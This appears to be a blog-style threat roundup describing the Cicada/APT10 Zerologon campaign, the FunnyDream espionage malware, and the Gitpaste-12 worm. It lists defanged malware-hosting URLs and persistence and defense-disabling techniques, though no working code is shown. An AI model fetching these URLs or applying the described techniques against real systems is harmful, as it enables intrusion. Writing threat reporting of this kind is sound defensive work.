Cicada 🐞Chinese sponsered

The hackers, most likely from a well-known group that’s funded by the Chinese government, are outfitted with both off-the-shelf and custom-made tools. One such tool exploits Zerologon,that can give attackers instant administrator privileges on vulnerable systems. Cicada , which is widely believed to be funded by the Chinese government and also carries the monikers of APT10, Stone Panda

Japan-linked organizations need to be on alert as it is clear they are a key target of this sophisticated and well-resourced group, with the automotive industry seemingly a key target in this attack campaign.

The attacks make extensive use of DLL side-loading, a technique that occurs when attackers replace a legitimate Windows dynamic-link library file with a malicious one. Attackers use DLL side-loading to inject malware into legitimate processes so they can keep the hack from being detected by security software.

Microsoft patched the critical privilege-escalation vulnerability in August, but since then attackers have been using it to compromise organizations that have yet to install the update. .

Threat Vector

Third-stage DLL has an export named “FuckYouAnti”

Third-stage DLL uses CppHostCLR technique to inject and execute the .NET loader assembly

.NET Loader is obfuscated with ConfuserEx v1.0.0

Final payload is QuasarRAT—an open source backdoor used by Cicada in the past

It’s difficult to say how..when..where.. you get attacked and compromised across geographies… Stay safe and secure

FunnyDream APT targets Asian countries

A new Chinese state-sponsored hacking group (also known as an APT) has infected more than 200 systems across Southeast Asia with malware over the past two years.Appears to be primarily interested in cyber-espionage, concentrating on stealing sensitive documents from infected hosts, with a special focus on national security and industrial espionage.

The malware infections are part of a widespread cyber-espionage campaign carried out by a group named  FunnyDream, targets in Malaysia, Taiwan, and the Philippines, with the most victims being located in Vietnam

Payloads has 3 malwares Chinoxy, PCShare, and FunnyDream

Each of the three malware strains has a precise role. Chinoxy was deployed as the initial malware, acting as a simple backdoor for initial access.

PCShare, known Chinese open-source remote access trojan, was deployed via Chinoxy and was used for exploring infected hosts.

FunnyDream was deployed with the help of PCShare, and was the most potent and feature-rich of the three, had more advanced persistence and communication capabilities, and was used for data gathering and exfiltration.

funnydream-timeline-tools.png

“Even looking at the tool usage timeline we can see that threat actors started by deploying a series of tools meant for quick and covert data exploration and exfiltration, and later decided to bring on a full toolkit, specifically the FunnyDream toolkit, for prolonged surveillance capabilities,” using living of the land tools

Gitpaste-12 Wormable bots.🐛🦠

GITY Worm

Gitpaste-12 is a new worm recently discovered uses GitHub and Pastebin for housing component code and has at least 12 different attack modules available ways to compromise

The GitHub repository used at the time of discovery was as follows:

https://github%5B.%5Dcom/cnmnmsl-001/-

Gitpaste-12 Core

The first phase of the attack is the initial system compromise .This worm has 12 known attack modules and more under development. The worm will attempt to use known exploits to compromise systems and may also attempt to brute force passwords.

Once compromising a system, the malware sets up a cron job it downloads from Pastebin, which in turn calls the same script and executes it again each minute. This is presumably one mechanism by which updates to the cron jobs can be pushed to the botnet.

The main shell script uploaded during the attack to the victim machine starts to download and execute other components of Gitpaste-12. First, it downloads and sets up cron job, which periodically downloads and executes script from Pastebin:

Next, it downloads from GitHub (https://raw.githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) and executes it.

The malware begins by preparing the environment. This means stripping the system of its defenses, including firewall rules, selinux, apparmor, as well as common attack prevention and monitoring software.

The shadu1 script contains comments in the Chinese language and has multiple commands available to attackers to disable different security capabilities,

Another capability is demonstrated in the ability to run miner for monero cryptocurrency

Worming Spread

The Gitpaste-12 malware also contains a script that launches attacks against other machines, in an attempt to replicate and spread. It chooses a random /8 CIDR for attack and will try all addresses within that range, as demonstrated by this call:

Another version of the script also opens ports 30004 and 30005 for reverse shell commands:

Final thought

No malware is good to have, but worms are particularly annoying. Their ability to spread in an automated fashion can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organization.